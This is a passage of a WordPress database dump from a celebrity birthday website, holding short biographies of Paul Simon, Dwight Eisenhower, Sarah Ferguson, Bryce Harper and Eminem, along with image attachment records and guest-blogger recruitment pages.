Children\'s Health Fund alongside Dr. Irwin Redlener. Better known as the CHF, the fund donates and staff medical vans in order to bring heath care to the poor children in rural and urban locations within the United States. Ever since 1986, <a href=\"http://www.childrenshealthfund.org/\" target=\"_blank\">CHF</a> has been able to make over three million patient and doctor visits.\r\n\r\nWhen Hurricane Katrina and Andrew struck down, CHF became the primary health care provider for the communities that were severely damaged by the hurricanes. Simon has also been able to raise a couple million dollars for causes such as The Joe Torre Safe At Home Foundations, AMFAR, Autism Speaks, The Nature Conservancy, and The Fund for Imprisoned Children in South Africa.\r\n\r\n[<a href=\"https://www.flickr.com/photos/wdecora/5920125322/in/photolist-a29c1f-a299Nd-a26h5Z-a26fbr-a26eCT-a26c7p-a26k2K-a26hs6-a29aLj-a29aYh-a29bnY-a26bf6-a295Y7-a297tW-a296Dh-a29bBw-a29ajJ-a298w7-a294Fb-a26dRX-a26i3D-a294Xb-a29695-aNdRPv-a26kyX-a26grV-a26gbc-a297dj-aNdRM8-7dUvUa-9KCddB-9KETwA-9KCiBc-9KERHN-9KC8xz-9KALMF-9KEYdE-9KCebV-9KF1aJ-9KC4Li-9KC6Bt-9jyaEe-9jyaHP-Ld2Do-YzeQF-833116-khLxou-rngpng-756EY8-ebv2eL\" target=\"_blank\">Front Image]</a>\r\n<h2 style=\"text-align: center;\">Do you share a birthday with Paul Simon?</h2>','Paul Simon','','publish','open','open','','paul-simon-birthday','','','2015-10-21 16:18:44','2015-10-21 16:18:44','',0,'http://birthdaypedia.com/?p=366',0,'post','',0),(367,2,'2015-10-14 07:16:57','2015-10-14 07:16:57','Dwight D. Eisenhower was the 34<sup>th</sup> president of the United States. He helped to ease <a href=\"http://www.history.com/topics/cold-war\" target=\"_blank\">Cold War</a> tensions by promoting Atoms for Peace at the United Nations General Assembly. He is one of the lesser known presidents of the United States, but that doesn\'t mean his accomplishments should not still be remembered.\r\n<h3>In the Beginning:</h3>\r\nDwight Eisenhower was born on October 14, 1890 in Denison, Texas. His parents were Ida Elizabeth Stover Eisenhower and David Jacob Eisenhower. Dwight was their third child out of seven boys. Before Dwight was born, his parents had recently moved from Abilene, Kansas to Denison, Texas. In Texas, the family resided in a tiny house near some railroad tracks.\r\n\r\nWhen he was only a year old, his family decided to move back to Abilene, Kansas. There, Dwight\'s father was able to take a good job working in his brother-in-law\'s creamery. When he was four, his brother Paul passed away at only ten months old. Regardless, Dwight had happy childhood memories growing up in Abilene. During this time of his life he spent a lot of time playing football and baseball.\r\n\r\nDwight attended Abilene High School, and graduated in 1909. He joined his uncle and father working in the Belle Springs Creamery for a while. He also worked as a fireman occasionally. Once he earned enough money, he paid for his brother Edgar to attend the University of Michigan. Dwight attended college, but Edgar ended up not having to pay for his brother\'s tuition.\r\n\r\nDwight had an appointment with the <a href=\"http://www.westpoint.edu/SitePages/Home.aspx\" target=\"_blank\">United States Military Academy</a> in West Point, New York in 1911. He was able to attend for free. He became a football star, but suffered knee injuries later on, forcing him to quit playing. He graduated from West Point in 1915, and became a second lieutenant.\r\n<h3>Career Accomplishments:</h3>\r\n<img class=\"alignright wp-image-370 size-medium\" title=\"General of the Army Dwight D. Eisenhower\" src=\"http://birthdaypedia.com/wp-content/uploads/2015/10/General-of-the-Army-Dwight-D.-Eisenhower-233x300.jpg\" alt=\"General of the Army Dwight D. Eisenhower\" width=\"233\" height=\"300\" />Later on in his life, Dwight was appointed the U.S. Army Chief of Staff in 1945. In 1951, Dwight became the first Supreme Allied Commander of the North Atlantic Treat Organization, or better known as <a href=\"https://history.state.gov/milestones/1945-1952/nato\" target=\"_blank\">NATO</a>. He was elected for U.S. President in 1952. Dwight went on to serve two terms as president before retiring in 1961.\r\n<h3>Most Known For:</h3>\r\nDwight is known as the 34<sup>th</sup> president of the United States. Throughout his military career, Dwight was promoted extensively. He was promoted to major general after he was transferred to the War Plans division in Washington, D.C. A few months later, he was once again promoted when he became commander-in-chief of the led Operation Torch and Allied Forces. On June 6, 1944, he commanded the Allied Forces during the <a href=\"http://eisenhower.archives.gov/research/online_documents/d_day.html\" target=\"_blank\">Normandy invasion</a>. During that same year he was promoted again to a five-star rank. During his presidency, he established Hawaii and Alaska as states.\r\n<h3>Legacy:</h3>\r\nAfter his presidency, Dwight retired to Gettysburg in his farmhouse alongside his wife Mamie. Even resigning his commission as a general once he became the president. Despite leaving his office, President Kennedy reactivated Dwight\'s commission. Dwight also had an office at Gettyburg College for the rest of his life. Where he wrote about his life and held a few meetings.\r\n\r\nDwight Eisenhower had a successful military and presidential career. He passed away on March 28, 1969 at the Walter Reed Army Hospital in Washington, D.C. He had been suffering a long time with a heart related illness. He was honored with a state funeral at the nation\'s capital. A military funeral was also held in his hometown of <a href=\"http://www.abilenecityhall.com/index.aspx?NID=9\" target=\"_blank\">Abilene, Kansas</a> to honor Eisenhower.\r\n\r\n[<a href=\"https://www.flickr.com/photos/nostri-imago/5022975133/in/photolist-8DS4vx-tBSwTi-jXtE9a-jTacbK-8DS4bZ-oemhsr-jTfxVE-jT9LsB-nX9ydd-oemhFT-nX9AUq-nX9TMx-dHA2pE-nXaHAB-oetqmm-kCCgqo-pJcv8-P7QeD-pJcv4-6LiZys-5qfciT-wHufrV-wquUjZ-kCA41t-kCAwhR-dMHZe-oeD72X-jTdfcP-8ixijc-8ixiAp-648Wfx-wGhkpG-wqnLow-jTfAU5-vL84Ce-wqo2n1-9PNw2p-jT9J6n-jTaAmv-2ybm6p-5HL2ZC-5EZSrz-5EZSui-pJcv5-5F5bo9-sLGCDp-pJcv2-pJcv6-cwmee9-dwZoN3\" target=\"_blank\">Image 1</a>] [<a href=\"https://commons.wikimedia.org/wiki/File:General_of_the_Army_Dwight_D._Eisenhower_1947.jpg\" target=\"_blank\">Image 2</a>]\r\n<h2 style=\"text-align: center;\">Do you share a birthday with Dwight Eisenhower?</h2>\r\n<h2 style=\"text-align: center;\"></h2>','Dwight Eisenhower (1890 – 1969)','','publish','open','open','','dwight-eisenhower-birthday','','','2015-10-21 17:02:16','2015-10-21 17:02:16','',0,'http://birthdaypedia.com/?p=367',0,'post','',0),(368,2,'2015-10-12 14:34:13','2015-10-12 14:34:13','','Paul Simon','','inherit','open','closed','','paul-simon-297','','','2015-10-12 14:34:24','2015-10-12 14:34:24','',366,'http://birthdaypedia.com/wp-content/uploads/2015/10/Paul-Simon.jpg',0,'attachment','image/jpeg',0),(369,2,'2015-10-12 14:34:19','2015-10-12 14:34:19','','Paul Simon','','inherit','open','closed','','paul_simon','','','2015-10-12 14:34:50','2015-10-12 14:34:50','',366,'http://birthdaypedia.com/wp-content/uploads/2015/10/Paul_Simon.jpg',0,'attachment','image/jpeg',0),(370,2,'2015-10-12 15:07:03','2015-10-12 15:07:03','','General of the Army Dwight D. Eisenhower','','inherit','open','closed','','general-of-the-army-dwight-d-eisenhower','','','2015-10-12 15:07:03','2015-10-12 15:07:03','',367,'http://birthdaypedia.com/wp-content/uploads/2015/10/General-of-the-Army-Dwight-D.-Eisenhower.jpg',0,'attachment','image/jpeg',0),(371,2,'2015-10-12 15:07:07','2015-10-12 15:07:07','','Dwight Eisenhower','','inherit','open','closed','','dwight-eisenhower','','','2015-10-12 15:07:07','2015-10-12 15:07:07','',367,'http://birthdaypedia.com/wp-content/uploads/2015/10/Dwight-Eisenhower.jpg',0,'attachment','image/jpeg',0),(372,2,'2015-10-12 15:27:33','0000-00-00 00:00:00','<h1><b>Love to Write? Passionate about Food?</b></h1>\nOff the Cook is always looking for new writers to join our team and share experiences and their love for all kinds of fare in their own unique voice. There is no strict commitment to posting as a guest — you can write one article or one hundred, and the topic is pretty much up to you so long as it pertains to delicious noms.\n<h2><b>What are the Benefits?</b></h2>\n<ul>\n <li>Gain exposure for your work in a new, growing audience in the food/dining realm</li>\n <li>Receive a byline/author bio, giving you full credit for your post and a backlink to your own site</li>\n <li>Expand the reach of your writing via social media promotion on our end (you should do the same within your networks, giving even more coverage to your work)</li>\n</ul>\n<h2><b>What Kind of Content is Needed on Off the Cook?</b></h2>\nIf you feel you have a story to tell based on your experience or passion for food (and are all about giving it a humorous twist), we want you to share it with the world!\n\nIn addition, we would love to feature seasoned chefs, restaurateurs, and pros in the food biz for an expert perspective. Our focus is to provide our audience with top notch food porn, reviews and features that will make them salivate through their computer screens. For your reference, we generally have several types of article formats such as the following:\n<ul>\n <li>Blog posts (informal and more personal recounts)</li>\n <li>Articles (relaying some type of newsworthy subject matter pertaining to the food industry)</li>\n <li>Listicles (numbering a certain amount of recipes, tips, ingredients, restaurants etc. on a page)</li>\n <li>and Slideshows (numbering a certain amount of recipes, tips, ingredients, restaurants etc. in a slideshow format)</li>\n</ul>\nIt should also be mentioned that there are a variety of subjects to which you can contribute. This includes <a href=\"http://offthecook.com/category/baking/\">Baking</a>, a <a href=\"http://offthecook.com/category/city-guide/\">City Guide</a>, <a href=\"http://offthecook.com/category/community/\">Community</a>, <a href=\"http://offthecook.com/category/cooking/\">Cooking</a>,<a href=\"http://offthecook.com/category/holidays/\">Holiday Features</a>, <a href=\"http://offthecook.com/category/how-to/\">How-Tos</a> and <a href=\"http://offthecook.com/category/food-news/\">News</a>. As a contributor you can write in either one or <i>all </i>of these topics if you please!\n<h2><b>Want to write for Off The Cook?</b></h2>\n<b>Writing and Submission Guidelines</b>\n\nWhen developing your piece, think about what inspires you most about food. If your subject incites passion in you, chances are it will do the same for readers, and that is our ultimate goal. Most importantly, we want to hear your voice in any writing you contribute. Don’t be bland, this is the food we eat (literally and figuratively, of course)! Some more guidelines?\n<ul>\n <li>Between 300 and 600 words is great for articles, but feel free to write as extensively as you please.</li>\n <li>For blog posts, there’s really no limit to your creativity, and thus no strict word count. However, consider breaking long stories into several posts to avoid sounding long-winded.</li>\n <li>Please PROOFREAD. Minor changes may be made to your piece for quality or clarity purposes. The integrity of your article will remain intact. Changing missed spelling errors or grammar issues is not meant to offend you, but improve the post.</li>\n <li>Attach images you want to include with your post with the appropriate attribution and credits included. People like to SEE the places we’re talking about, so photos are highly encouraged.</li>\n <li>When including quotes, studies, facts, or stats, please include a SOURCE so the reader knows that this is valid information.</li>\n <li>Submit your post in word document format.</li>\n</ul>\n<b>As a writer for Off The Cook you must:</b>\n<ul>\n <li>Share your blog post and website with others through social media, email and word-of-mouth</li>\n <li>Engage in the comment section of your post and other articles on the site</li>\n <li>Be a fan of Off The Cook on Facebook and follow us on Twitter!</li>\n</ul>\nPlease send over your ideas and a link to your blog or attach samples of your work to get started as a guest writer for the website. You can contact us<a href=\"http://wellnessjunky.com/contact/\">here</a> to get started.','','','draft','closed','closed','','','','','2015-10-12 15:27:33','2015-10-12 15:27:33','',0,'http://birthdaypedia.com/?page_id=372',0,'page','',0),(376,2,'2015-10-12 16:57:20','2015-10-12 16:57:20','','twitter500-150x150','','inherit','open','closed','','twitter500-150x150','','','2015-10-12 16:57:20','2015-10-12 16:57:20','',0,'http://birthdaypedia.com/wp-content/uploads/2015/07/twitter500-150x150.png',0,'attachment','image/png',0),(377,2,'2015-10-12 16:57:22','2015-10-12 16:57:22','','facebook5001-e1326144910961','','inherit','open','closed','','facebook5001-e1326144910961','','','2015-10-12 16:57:22','2015-10-12 16:57:22','',0,'http://birthdaypedia.com/wp-content/uploads/2015/07/facebook5001-e1326144910961.png',0,'attachment','image/png',0),(378,2,'2015-10-12 16:59:40','2015-10-12 16:59:40','','11817212_407467352784092_7088324366362359981_n-1','','inherit','open','closed','','11817212_407467352784092_7088324366362359981_n-1','','','2015-10-12 16:59:40','2015-10-12 16:59:40','',0,'http://birthdaypedia.com/wp-content/uploads/2015/07/11817212_407467352784092_7088324366362359981_n-1.png',0,'attachment','image/png',0),(380,2,'2015-10-12 18:05:11','2015-10-12 18:05:11','<p style=\"text-align: center;\"><a href=\"http://birthdaypedia.com/wp-content/uploads/2015/10/hed.jpg\"><img class=\"alignnone wp-image-402\" src=\"http://birthdaypedia.com/wp-content/uploads/2015/10/hed.jpg\" alt=\"hed\" width=\"768\" height=\"243\" /></a></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #000000;\">They say celebrities are just like us, but we know that\'s not really true, is it? No... it\'s not, But, most of us do have something in common with those A-listers we\'re always watching on the big screen and elsewhere: <span style=\"color: #ff0000;\">our birthdays</span>.</span></h3>\r\n<h3 style=\"text-align: center;\"><span style=\"color: #000000;\">Here at <span style=\"color: #00ccff;\">BirthdayPedia</span>, we aim to be the one-stop place where you can find a number of celebrities born on your birthday, your mom\'s birthday, and even your dog\'s birthday. You\'ll also find some fun information regarding your favorite stars, politicians and historical figures.</span></h3>\r\n<h3 style=\"text-align: center;\"><span style=\"color: #000000;\">You can find out if you share your birthday with Justin Timberlake, Vladimir Putin and Ghandi. Or you can learn about President Obama\'s early years, who Matt Damon is married to, and Carole Lombard\'s rise to fame.</span></h3>\r\n<h3 style=\"text-align: center;\"><span style=\"color: #000000;\">So let us officially welcome you to <span style=\"color: #00ccff;\">BirthdayPedia</span>, where the birthday celebrations never stop.</span></h3>\r\n<h1 style=\"text-align: center;\"><strong><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"http://birthdaypedia.com/contact-us/\" target=\"_blank\">Contact us</a></span>, we really want to hear from you! </strong></h1>','About Us','','publish','closed','closed','','about-us','','','2017-01-27 19:45:24','2017-01-27 19:45:24','',0,'http://birthdaypedia.com/?page_id=380',0,'page','',0),(381,2,'2015-10-15 07:29:02','2015-10-15 07:29:02','Sarah Ferguson was once married to <a href=\"https://en.wikipedia.org/wiki/Prince_Andrew,_Duke_of_York\" target=\"_blank\">Prince Andrew of England</a>. Many people know her as the spokesperson for Weight Watchers. She has worked as an actress and writer. People have even come to give her the nickname “Her Grace Sarah, Duchess of York.\"\r\n<h3>In the Beginning</h3>\r\nSarah was born on October 15, 1959 in <a href=\"http://www.cityoflondon.gov.uk/Pages/default.aspx\" target=\"_blank\">London, England</a>. She was the second daughter born to Major Ronald Ivor Ferguson. Sarah\'s upbringing had a many privileges. She attended a private boarding school. Even becoming skilled at horseback riding as well.\r\n\r\nHer father worked for the Prince of Wales\' polo team as the manager. So, from a young age she came to know the member of the Royal Family quite well. Her parents filed for a divorce when she was only thirteen years old. As she grew older, Sarah attended a secretarial college. She graduated and work for a publishing company, public relations firm, and an art gallery.\r\n<h3>Career Accomplishments</h3>\r\nSarah Ferguson has had a rich and varied career. She has written a number of children\'s books throughout her career. Along with being the representative of the Weight Watchers program. Along with doing a bit of film work. Including starring in a few films such as <em>Budgie the Little Helicopter</em> in 1994, <a href=\"http://www.imdb.com/title/tt1237794/\" target=\"_blank\"><em>The Duchess in Hull</em> </a>in 2008, and <em>PJ\'s Storytime</em> in 2004.\r\n<h3>Most Known For</h3>\r\n<img class=\"alignright wp-image-382 size-medium\" title=\"Sarah Ferguson\" src=\"http://birthdaypedia.com/wp-content/uploads/2015/10/Sarah_Ferguson-196x300.jpg\" alt=\"Sarah Ferguson\" width=\"196\" height=\"300\" />Many people recognize Sarah for her marriage to Prince Andrew. The two met in 1985, and married the year after that in <a href=\"http://www.westminster-abbey.org/\" target=\"_blank\">Westminster Abbey</a>. The couple had two children named Eugenie and Beatrice. In the 1990s, she did a couple of commercials for Weight Watchers as well. At one point she was dubbed the “Duchess of York” . At one point even hosting a talk show for a short amount of time.\r\n<h3>Current Personal Life</h3>\r\nSarah Ferguson has continued to show up on and off for her career. So far, she has penned an autobiography along with a few dieting guides. There are a few children\'s books floating around as well she has written. She and Prince Andrew separated in 1992, but divorced in 1996.They lived together in separate living quarters for a while.\r\n\r\nDuring the time she was married to Prince Andrew though. Sarah found herself criticized for her outspoken manner and the extravagant lifestyle she led. Their marriage became troubled due to Prince Andrew having to take long trips since he was serving in the Royal Navy.\r\n<h3>Where Are They Now</h3>\r\nQuite recently, Sarah Ferguson has been making headlines again. Despite being divorced from Andrew. She has been at the center of media attention quite recently when she came to Prince Andrew\'s defense. There claims made against her former husband about underage sex claims, but so far nothing has come of them. Despite their separation, Sarah Ferguson had demonstrated she still strongly supports Andrew. It has even been said that despite the separation, Ferguson may hold more sway over the Prince than even his own mother. Since the two are apparently still on good terms.\r\n\r\nSarah Ferguson is an interesting person. She married Prince Andrew, supports him in the worst of times, and has a varied career. At one point she was the spokesperson for <a href=\"https://www.weightwatchers.com/success/doy/doy_ss.aspx\" target=\"_blank\">Weight Watchers</a>. Once again swinging back and forth to perform in a handful of movies as well. She has even written quite a few children\'s books in her time as well. Despite her age, it appears Sarah Ferguson is still going strong. It may even be possible she gets back together with Prince Andrew at some point. Will it happen? No one know, but the Duchess of York.\r\n\r\n[<a href=\"https://en.wikipedia.org/wiki/Sarah,_Duchess_of_York#/media/File:SarahFerguson09TIFF.jpg\" target=\"_blank\">Image 1</a>] [<a href=\"https://en.wikipedia.org/wiki/File:Sarah_Ferguson_in_Leeds_2008.jpg\" target=\"_blank\">Image 2</a>]\r\n<h2 style=\"text-align: center;\">Do you share a birthday with Sarah Ferguson?</h2>\r\n<h2 style=\"text-align: center;\"></h2>','Sarah Ferguson','','publish','open','open','','sarah-ferguson-birthday','','','2015-10-30 13:59:21','2015-10-30 13:59:21','',0,'http://birthdaypedia.com/?p=381',0,'post','',0),(382,2,'2015-10-12 17:50:32','2015-10-12 17:50:32','','Sarah_Ferguson','','inherit','open','closed','','sarah_ferguson','','','2015-10-12 17:50:32','2015-10-12 17:50:32','',381,'http://birthdaypedia.com/wp-content/uploads/2015/10/Sarah_Ferguson.jpg',0,'attachment','image/jpeg',0),(383,2,'2015-10-12 17:50:38','2015-10-12 17:50:38','','Sarah Ferguson','','inherit','open','closed','','sarah-ferguson','','','2015-10-12 17:50:38','2015-10-12 17:50:38','',381,'http://birthdaypedia.com/wp-content/uploads/2015/10/Sarah-Ferguson.jpg',0,'attachment','image/jpeg',0),(384,2,'2015-10-12 17:55:51','2015-10-12 17:55:51','','aboutus','','inherit','open','closed','','aboutus','','','2015-10-12 17:55:51','2015-10-12 17:55:51','',380,'http://birthdaypedia.com/wp-content/uploads/2015/10/aboutus.jpg',0,'attachment','image/jpeg',0),(385,2,'2015-10-12 17:57:13','2015-10-12 17:57:13','','Untitled-4','','inherit','open','closed','','untitled-4','','','2015-10-12 17:57:13','2015-10-12 17:57:13','',380,'http://birthdaypedia.com/wp-content/uploads/2015/10/Untitled-4.jpg',0,'attachment','image/jpeg',0),(386,2,'2015-10-12 18:02:57','2015-10-12 18:02:57','','Untitled-4','','inherit','open','closed','','untitled-4-2','','','2015-10-12 18:02:57','2015-10-12 18:02:57','',380,'http://birthdaypedia.com/wp-content/uploads/2015/10/Untitled-41.jpg',0,'attachment','image/jpeg',0),(387,2,'2015-10-12 18:04:09','2015-10-12 18:04:09','','Untitled-4','','inherit','open','closed','','untitled-4-3','','','2015-10-12 18:04:09','2015-10-12 18:04:09','',380,'http://birthdaypedia.com/wp-content/uploads/2015/10/Untitled-42.jpg',0,'attachment','image/jpeg',0),(390,2,'2015-10-12 19:23:24','2015-10-12 19:23:24','<strong>Are you a celebrity trivia whiz? Do you love to write? Should your birthday a national holiday?</strong>\r\n\r\nIf you answered yes to all of these questions, then we want you to become a guest blogger for BirthdayPedia. We are always looking for contributors who are passionate about celebrities, writing and of course, birthdays. There is no strict commitment to posting as a guest — you can write one article or one hundred!\r\n\r\n<strong>What are the Benefits?</strong>\r\n<ul>\r\n <li>Gain exposure for your work in a new, growing audience in the celebrity realm.</li>\r\n <li>Receive a byline/author bio, giving you full credit for your post and a backlink to your own site!</li>\r\n</ul>\r\n<strong><span style=\"line-height: 1.5;\">What Kind of Content is Needed on BirthdayPedia?</span></strong>\r\n\r\nSo many celebrities, such little time! We\'re looking for folks who are willing to research celebrities on their birthdays, so we can continue to grow our extensive BirthdayPedia.\r\n\r\nHere are the types of formats we’re looking for:\r\n<ul>\r\n <li>Blog posts (facts about celebrities on their birthdays).</li>\r\n <li>Listicles (a list of celebrities born on a certain day or who are a certain age).</li>\r\n <li>Slideshows (photos that are accompanied by relevant information).</li>\r\n <li>It should also be mentioned that there are a variety of celebrity birthdays to which you can contribute. This includes: Singers, Actors, Politicians, Humanitarians and Comedians.</li>\r\n</ul>\r\n<strong>Want to write for BirthdayPedia?</strong>\r\n\r\nWriting and Submission Guidelines\r\n\r\nWe definitely want someone who can keep with BirthdayPedia\'s voice when contributing posts. We come from a place of information, but with listicles and slideshows, there\'s definitely more room to have fun!\r\n<ul>\r\n <li>Between 300 and 600 words is great for articles, but feel free to write as extensively as you please.</li>\r\n <li>Please PROOFREAD. Minor changes may be made to your piece for quality or clarity purposes. The integrity of your article will remain intact. Changing missed spelling errors or grammar issues is not meant to offend you, but improve the post.</li>\r\n <li>Attach images you want to include with your post with the appropriate attribution and credits included. People like to SEE the places we’re talking about, so photos are highly encouraged.</li>\r\n <li>When including quotes, studies, facts, or stats, please include a SOURCE so the reader knows that this is valid information.</li>\r\n <li>Submit your post in word document format.</li>\r\n</ul>\r\n<strong>As a writer for BirthdayPedia you must:</strong>\r\n<ul>\r\n <li>Share your blog post and website with others through social media, email and word-of-mouth.</li>\r\n <li>Engage in the comment section of your post and other articles on the site.</li>\r\n <li>Be a fan of BirthdayPedia on <a href=\"https://www.facebook.com/birthdaypedia?_rdr=p\" target=\"_blank\">Facebook</a> and follow us on <a href=\"https://twitter.com/birthdaypedia\" target=\"_blank\">Twitter</a>!</li>\r\n <li>Please send over your ideas and a link to your blog or attach samples of your work to get started as a guest writer for the website. You can contact us <a href=\"http://birthdaypedia.com/contact-us/\" target=\"_blank\">here</a> to get started.</li>\r\n</ul>\r\n ','Become A BirthdayPedia Guest Blogger','','publish','closed','closed','','birthdaypedia-guest-blogger','','','2015-10-12 19:24:20','2015-10-12 19:24:20','',0,'http://birthdaypedia.com/?page_id=390',0,'page','',0),(391,2,'2015-10-16 09:49:45','2015-10-16 09:49:45','Bryce Harper is a baseball player people may or may have not heard of before. He played for the <a href=\"http://www.csn.edu/\" target=\"_blank\">Southern Nevada Community College</a>. He has been one of the most hyped baseball players for his generation. Able to throw a baseball going at 96mph. He\'s been hailed as one of the most advanced baseball players like Alex Rodriguez and Ken Griffey Jr.\r\n<h3>In the Beginning</h3>\r\nBryce Harper was born on October 16, 1992 in <a href=\"http://www.lasvegasnevada.gov/faces/\" target=\"_blank\">Las Vegas, Nevada</a>. When he was six years old he would go to the Church of Latter Day Saints to hit a ball and mess around. His older brother, Bryan, would also come along to play with him. Their father, Ron Harper, worked as a steelworker. He worked Bryce and his brother Brian hard when it came to throwing and hitting.\r\n\r\nDuring the early years, he would frequent a high school once a week in order to practice his hitting. As an eight grader, he would dominate the intrasquad. Soon after, the wheels for the start of his professional career began to move forward. Bryce Harper passed his GED and enrolled in junior college right away. Soon after, he started playing once more. When he was only nineteen years old, he became the youngest player ever to be selected for an <a href=\"http://www.usatoday.com/story/sports/mlb/2015/07/05/mlb-all-star-game-starters/29746891/\" target=\"_blank\">MLB All-Star Game</a>.\r\n\r\n<img class=\"aligncenter wp-image-393\" src=\"http://birthdaypedia.com/wp-content/uploads/2015/10/Bryce_Harper.jpg\" alt=\"Bryce_Harper\" width=\"700\" height=\"480\" />\r\n<h3>Career Accomplishments</h3>\r\nHe helped the American U-18 team win a gold medal. During the Power Showcase at Tropicana Field in Tampa Bay in 2008, Bryce gained his notoriety. He hit <a href=\"http://www.sportingnews.com/mlb/story/2015-09-04/bryce-harper-longest-home-run-career-washington-nationals-mlb-baseball\" target=\"_blank\">the longest home run</a> that has ever been recorded at the Trop, measuring 502 feet. Sports Illustrated even dubbed him the “Lebron James of Baseball” and “The Chosen One.\" He became the youngest player to ever be accepted by the MLB draft in 2010.\r\n<h3>Most Known For</h3>\r\n<img class=\"alignright wp-image-394\" src=\"http://birthdaypedia.com/wp-content/uploads/2015/10/Bryce-Harper1.jpg\" alt=\"Bryce-Harper\" width=\"180\" height=\"240\" />Harper is most known for being the youngest player who has ever been selected for the MLB All-Star Game. Many fans know him for playing for the Southern Nevada Community College as well. Along with his hit that have been measured to reach 570 feet. Currently, he is playing for the <a href=\"http://washington.nationals.mlb.com/index.jsp?c_id=was\" target=\"_blank\">Washington Nationals</a> as the Outfielder.\r\n<h3>Current Personal Life</h3>\r\nAt one point Bryce Harper was dating a woman named Kayla Varner. They did not hide the relationship, and in fact it was very public indeed. Even stretching to public wedding plans being made. Unfortunately, the two split after four years of dating. The wedding never happened either.\r\n<h3>Where Are They Now</h3>\r\nBryce Harper continues to play baseball, even to this day. He was drafted into the Washington Nationals in 2010. His debut taking place on April 28, 2012. Despite his age, Bryce Harper has continued to grow and evolve as a player. In his teenager years, when he was being scouted for future prospects. There were many people who doubted Harper could ever make it to the big leagues. However, Bryce Harper proved them all wrong by making it anyway. If he sticks to his dedication and passion he has for the game. He\'ll be sure to go far as a baseball player.\r\n\r\n[<a href=\"https://www.flickr.com/photos/keithallison/14636939003/in/photolist-oiq92i-eyeNMD-ck3oTW-cjxgF9-uUwCTN-cjvKFj-cjwM1J-diE9YX-vU33LD-ck8DkA-eyicqw-d5od4f-ck6Lbd-ck8MbW-ck8G4b-ck6Pqh-cj1T47-ck8U2Q-ck8JHL-ciYCTy-9qbzrB-vVfdi1-uX2pCE-vTpADN-bDvRBu-diD8Kd-eeBWSd-vRRDbR-vBmuyR-bV98Nx-cjAb3Y-9qbzgr-9qeB3d-9qbzdK-bSrnte-ck8Rjy-ck8Xo7-9pv6ho-cuBe2E-eyeLaa-ogFSRv-eyeu92-eyi3XW-diEjYe-diBfkJ-cjxmdG-cJ5eFh-vyRQFd-9qdrce-cjx8SG\" target=\"_blank\">Image 1</a>] [<a href=\"https://www.flickr.com/photos/125093064@N07/14569669391/sizes/n/\" target=\"_blank\">Image 2</a>] [<a href=\"https://www.flickr.com/photos/ableman/7134342503/sizes/z/\" target=\"_blank\">Image 3</a>]\r\n\r\n \r\n\r\n ','Bryce Harper','','publish','open','open','','bryce-harper-birthday','','','2015-10-30 15:20:16','2015-10-30 15:20:16','',0,'http://birthdaypedia.com/?p=391',0,'post','',0),(392,2,'2015-10-12 20:16:55','2015-10-12 20:16:55','','Bryce Harper','','inherit','open','closed','','bryce-harper','','','2015-10-12 20:16:55','2015-10-12 20:16:55','',391,'http://birthdaypedia.com/wp-content/uploads/2015/10/Bryce-Harper.jpg',0,'attachment','image/jpeg',0),(393,2,'2015-10-12 20:17:00','2015-10-12 20:17:00','','Bryce_Harper','','inherit','open','closed','','bryce_harper','','','2015-10-12 20:17:00','2015-10-12 20:17:00','',391,'http://birthdaypedia.com/wp-content/uploads/2015/10/Bryce_Harper.jpg',0,'attachment','image/jpeg',0),(394,2,'2015-10-12 20:17:03','2015-10-12 20:17:03','','Bryce-Harper','','inherit','open','closed','','bryce-harper-2','','','2015-10-12 20:17:03','2015-10-12 20:17:03','',391,'http://birthdaypedia.com/wp-content/uploads/2015/10/Bryce-Harper1.jpg',0,'attachment','image/jpeg',0),(396,2,'2015-10-12 20:39:03','2015-10-12 20:39:03','','11817212_407467352784092_7088324366362359981_n-1','','inherit','open','closed','','11817212_407467352784092_7088324366362359981_n-1-2','','','2015-10-12 20:39:03','2015-10-12 20:39:03','',0,'http://birthdaypedia.com/wp-content/uploads/2015/07/11817212_407467352784092_7088324366362359981_n-11.png',0,'attachment','image/png',0),(397,2,'2015-10-12 20:42:37','2015-10-12 20:42:37','','Screen Shot 2015-10-12 at 4.42.11 PM','','inherit','open','closed','','screen-shot-2015-10-12-at-4-42-11-pm','','','2015-10-12 20:42:37','2015-10-12 20:42:37','',0,'http://birthdaypedia.com/wp-content/uploads/2015/07/Screen-Shot-2015-10-12-at-4.42.11-PM.png',0,'attachment','image/png',0),(398,2,'2015-10-12 20:43:42','2015-10-12 20:43:42','','Screen Shot 2015-10-12 at 4.43.27 PM','','inherit','open','closed','','screen-shot-2015-10-12-at-4-43-27-pm','','','2015-10-12 20:43:42','2015-10-12 20:43:42','',0,'http://birthdaypedia.com/wp-content/uploads/2015/07/Screen-Shot-2015-10-12-at-4.43.27-PM.png',0,'attachment','image/png',0),(399,2,'2015-10-12 20:46:14','2015-10-12 20:46:14','','iStock_000008906483_Small','','inherit','open','closed','','istock_000008906483_small','','','2015-10-12 20:46:14','2015-10-12 20:46:14','',0,'http://birthdaypedia.com/wp-content/uploads/2015/07/iStock_000008906483_Small.jpg',0,'attachment','image/jpeg',0),(402,2,'2015-10-12 21:37:59','2015-10-12 21:37:59','','hed','','inherit','open','closed','','hed','','','2015-10-12 21:37:59','2015-10-12 21:37:59','',380,'http://birthdaypedia.com/wp-content/uploads/2015/10/hed.jpg',0,'attachment','image/jpeg',0),(408,2,'2015-10-13 13:08:59','2015-10-13 13:08:59','','Screen Shot 2015-10-13 at 9.08.34 AM','','inherit','open','closed','','screen-shot-2015-10-13-at-9-08-34-am','','','2015-10-13 13:08:59','2015-10-13 13:08:59','',0,'http://birthdaypedia.com/wp-content/uploads/2015/10/Screen-Shot-2015-10-13-at-9.08.34-AM.png',0,'attachment','image/png',0),(411,2,'2015-10-17 12:00:32','2015-10-17 12:00:32','Eminem is one of the best selling artists of the early 21<sup>st</sup> century. He\'s an actor, rapper, and record producer. His work has been seen as controversial for the material he has produced overtime. Eminem\'s real name is Marshall Bruce Mathers III, and his nickname is Slim Shady. His story is one of struggle, commitment, and trying to rise above his surroundings to reach the top.\r\n<h3>In the Beginning</h3>\r\nEminem was born on October 17, 1972 at <a href=\"http://www.ci.st-joseph.mo.us/\" target=\"_blank\">St. Joseph, Missouri</a>. His father, Marshall Mathers Jr., had abandoned the family soon after Eminem was born. Rebuffing any attempts Eminem made in the future to contact him throughout his childhood. His mother, Deborah Mathers, was apparently abusive. During his childhood, Eminem moved with his mother from Missouri to Detroit, Michigan, where he spent much of his time in public housing projects.\r\n\r\nEminem changed schools roughly 2-3 times each year. This lifestyle led to him being treated as an 